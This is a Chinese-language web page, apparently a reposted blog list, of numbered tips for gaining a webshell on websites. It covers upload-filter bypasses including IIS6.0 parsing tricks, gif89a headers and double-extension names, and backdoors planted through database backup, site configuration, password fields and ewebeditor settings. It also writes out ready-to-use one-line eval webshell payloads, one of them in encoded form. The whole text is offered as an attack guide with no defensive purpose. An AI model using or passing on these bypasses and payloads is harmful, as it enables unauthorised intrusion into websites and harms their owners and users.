1. 程式人生 > >一些拿shell的技巧

一些拿shell的技巧

漏洞 有時 例如 strong 空格 -1 根目錄 找到 代碼

轉自: 一些拿shell的技巧

1.直接上傳asp asa jsp cer php aspx htr cdx 格式的木馬,不行就加個空格或是利用IIS6.0解析漏洞,常見格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg

2.有時上傳圖片格式的木馬,居然被程序檢測攔截了,右鍵記事本打開木馬,在代碼最前面加上gif89a,再數據庫備份備份成asp格式的木馬拿下shell。

3.上傳圖片格式木馬,復制地址到數據庫備份備份成asp格式木馬,有時不成功的話,就利用IIs6.0解析漏洞,格式:1.asp; 或 1.asp;jpg

4.上傳圖片格式木馬,用抓包工具進行抓包,抓到的信息裏面包含了上傳路徑以及cookie值,再利用明小子的綜合上傳功能上傳asp木馬即可拿下shell。

5.當後臺有數據庫備份,但是沒有任何上傳點的時候,把一句話木馬插在任意處,再到數據庫備份備份成asp格式木馬,用菜刀連接一句話木馬即可。

6.當後臺存在網站配置,可以在裏面增加任意圖片格式,例如:asp 這時就可以上傳asp格式的木馬了,有時不成功的話,就增加一個:aaspsp 即可繞過。

7.當頁面提示“上傳格式不正確[重新上傳]”,說明存在上傳漏洞,復制地址放到明小子裏上傳,一般都能成功拿下shell。

8.當數據庫備份功能用不了時,如果有數據庫恢復的話,可以當作數據庫備份一樣使用,兩者之間的功能以及效果是一樣的。

9.一般PHP後臺都有可增加目錄功能,直接建立個目錄,名稱寫1.asp,內容寫腳本木馬的代碼,保存後訪問地址即可拿下shell。

10.有些網站前臺存在“會員註冊”,嘗試註冊一個賬戶進去找上傳點,直接上傳asp或解析漏洞,不行就抓包明小子上傳,再者就是嘗試一句話木馬。

11.當後臺存在網站配置,在裏面插入變異的一句話木馬:"%><%eval request("x")%><%s="訪問路徑:inc/config.asp

12.當頁面提示只能上傳jpg|gif|png等格式的時候,右鍵查看源文件,本地修改為asp|asa|php再上傳即可突破拿下shell。

13.登陸後臺,點擊修改密碼---新密碼設置為:1":eval request("h")’設置成功後,訪問asp/config.asp文件即可,一句話木馬被寫入到這個文件裏面了.

14.當用啊D檢測註入點,提示SA權限或DB權限的時候,嘗試列目錄,然後找到網站根目錄復制,再點擊cmd/上傳,直接上傳asp腳本木馬,不行就用差異備份拿shell。

15.在新聞發布、版權信息、留言管理處插入數據庫加密的一句話:┼攠數畣整爠煥敵瑳∨≡┩愾,訪問路徑inc/config.asp,菜刀連接密碼:a

16.一般後臺都存在ewebeditor編輯器,只要找出絕對路徑登錄進去,可以在樣式管理中增加asa|aasasa 再點擊預覽進行上傳腳本木馬即可。

18.用火狐瀏覽器登錄後臺,再打開雙文件上傳工具替換上傳路徑,這時直接將其拖入火狐瀏覽器裏,第一個選jpg圖片,第二個選cer木馬,上傳即可突破!

一些拿shell的技巧